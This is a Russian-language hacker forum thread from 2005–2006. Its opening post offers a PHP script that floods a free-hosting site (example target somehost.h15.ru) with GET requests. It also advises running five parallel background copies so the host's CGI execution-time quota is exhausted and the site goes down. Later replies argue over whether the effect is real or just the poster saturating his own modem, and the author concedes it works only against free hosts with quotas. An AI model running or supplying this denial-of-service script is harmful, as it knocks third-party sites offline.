CGI execution time на бесплатных хостах .h**

Discussion in 'Статьи' started by fucker"ok, 2 Nov 2005.

  1. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    578
    Likes Received:
    274
    Reputations:
    91
    Написать большую статью об этом не получится, поэтому я просто расскажу о этой штуке.
    Навернякак все пользовались бесплатными хостами. Один из лучших халявных хостеров - агава. (Все сайты в зоне .H**.ru)
    На ней я и испытывал элементарный дос GET запросами.
    На этих хостах стоит ограничение на время исполнения CGI
    Вот на этом и можно сыграть, а именно: сделать сайт нерабочим.

    Сделать это до смеху просто: послать большое кол-во GET запросов. (даже дело не в колличестве, а во времени посылки)

    Напишим скрипт который будет посылать запросы:
    Code:
    <?php
    function GET($server,$url,$cookie=null)
    {
           $q="GET $url HTTP/1.0\r\n";
           $q.="Host: $server\r\n";
            if ($cookie) $q.="Cookie: $cookie\r\n";
            $q.="\r\n";
            $s=fsockopen($server,80);
           fputs($s,$q);
            fclose($s);
    
    }
    
    $host='somehost.h15.ru';
    $page='/index.php';
    for ($i=0; $i<100; $i++)
    {
        GET($host,$page);
    }
    ?>
    
    Думаю всё понятно: скрипт посылает 100 запросов хосту somehost.h15.ru на получение страници /index.php

    Ещё лучше запустить этот скрипт раз 5 одновременно (чтобы работало пять процессов).
    $php dos.php > /dev/null &
    я делаю так раз 5.
    Вот запустили вы скрипт и заходите на этот самый somehost.h15.ru/index.php
    А вместо этого видите что-то вроде
    Самое главное чтобы добится такой ошибки ненадо широкого канала, достаточно обычного модема (у меня модем)
    Тестировал исключительно на халявной Агаве, возможно работать будет и на других бесплатных хостерах.

    (на народе работать не будет, потому-что там нет никакого cgi :) )
     
    2 people like this.
  2. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    хм.. а случайно ты не одном хосте расположил dos.php и index.php когда тестировал?
     
  3. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,125
    Likes Received:
    819
    Reputations:
    97
    А с помощь. инеткряка что-нить подобное замутить можно??? )))
     
  4. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    382
    Likes Received:
    144
    Reputations:
    29
    инет крак запросы по моему медленней посылает))))ггг
     
  5. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    Молодец. Терпение и труд всем надают :)
     
  6. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Как мне кажется, это происходит изза квот для каждого виртуального хоста, иначе один сайт подвесил бы весь хостинг, если бы жрал слишком много проц. времени.
     
  7. lexa

    lexa Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    75
    Likes Received:
    11
    Reputations:
    -2

    это происходит из -за превышения запросов с твоего ip
    у p4p такаяже тулза есть ! так вот она просто грузит весь траф!
    а если зайти с другого компа то все в норме и сайт работает нармально !
    все что ты можешщшьто это немного нагрузить их траф!
    хотя может квоты тоже играют свою роль но хм , попробуй запустить на длругом серваке этот скрипт и посмотреть на этот сайт который который ддоси
     
  8. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Грузит весь траф - это как понять... По конкретнее...
     
  9. lexa

    lexa Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    75
    Likes Received:
    11
    Reputations:
    -2
    хм ! сорри тут подумал про квоты !!! может быть такия тяга только на холявных хостах ! да и сейчас запустил этот скрип на свой сайт но все работает как работало !

    500 мб/с мой траф ! когда с него запускаю в 5 потоков то загрузка падает но только у меня !

    запускал с другого хоста ! тотже эфект только теперь и у меня все нештяк работает !
     
  10. lexa

    lexa Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    75
    Likes Received:
    11
    Reputations:
    -2
    тоесть ! если ты сидишь на модеме. то просто забиваеться твой траф этими покетами ! комп (верней не комп а твое сетевое оборудование ! )не успевает обработать все входяшие ответы и выходящие пакеты !они становяться в очередь .вот и все ! класический способ самоддосса =)))
    у тебя все твои 56 уходят на этоти запросы!
     
    #10 lexa, 8 Feb 2006
    Last edited: 8 Feb 2006
  11. fucker"ok

    fucker"ok Elder - Старейшина

    Joined:
    21 Nov 2004
    Messages:
    578
    Likes Received:
    274
    Reputations:
    91
    ну правельно - всё дело в квотах на бесплатных хостингах. На нормальных хостах такая тема не пройдёт, конечно, это может затормозить процессор на генирацию страниц, но думаю на нынишних серверах (аля ксеон'ы на борту) эти тормоза вывидутся в доли секунды :)
    Тоесть таким делом вывести из строя нормальный хост с модемом явно не светит, ну а бесплатный хост можно. Другое дело: бесплатные хосты почти никому досить в голову не прийдёт (просто мало кому это нужно), но бывают случаи... :p
     
Loading...
Similar Threads - execution бесплатных хостах
  1. reanbrain
    Replies:
    1
    Views:
    1,480
  2. GREQUE
    Replies:
    11
    Views:
    9,383
  3. Matrix001
    Replies:
    12
    Views:
    12,268
  4. Rebz
    Replies:
    0
    Views:
    4,246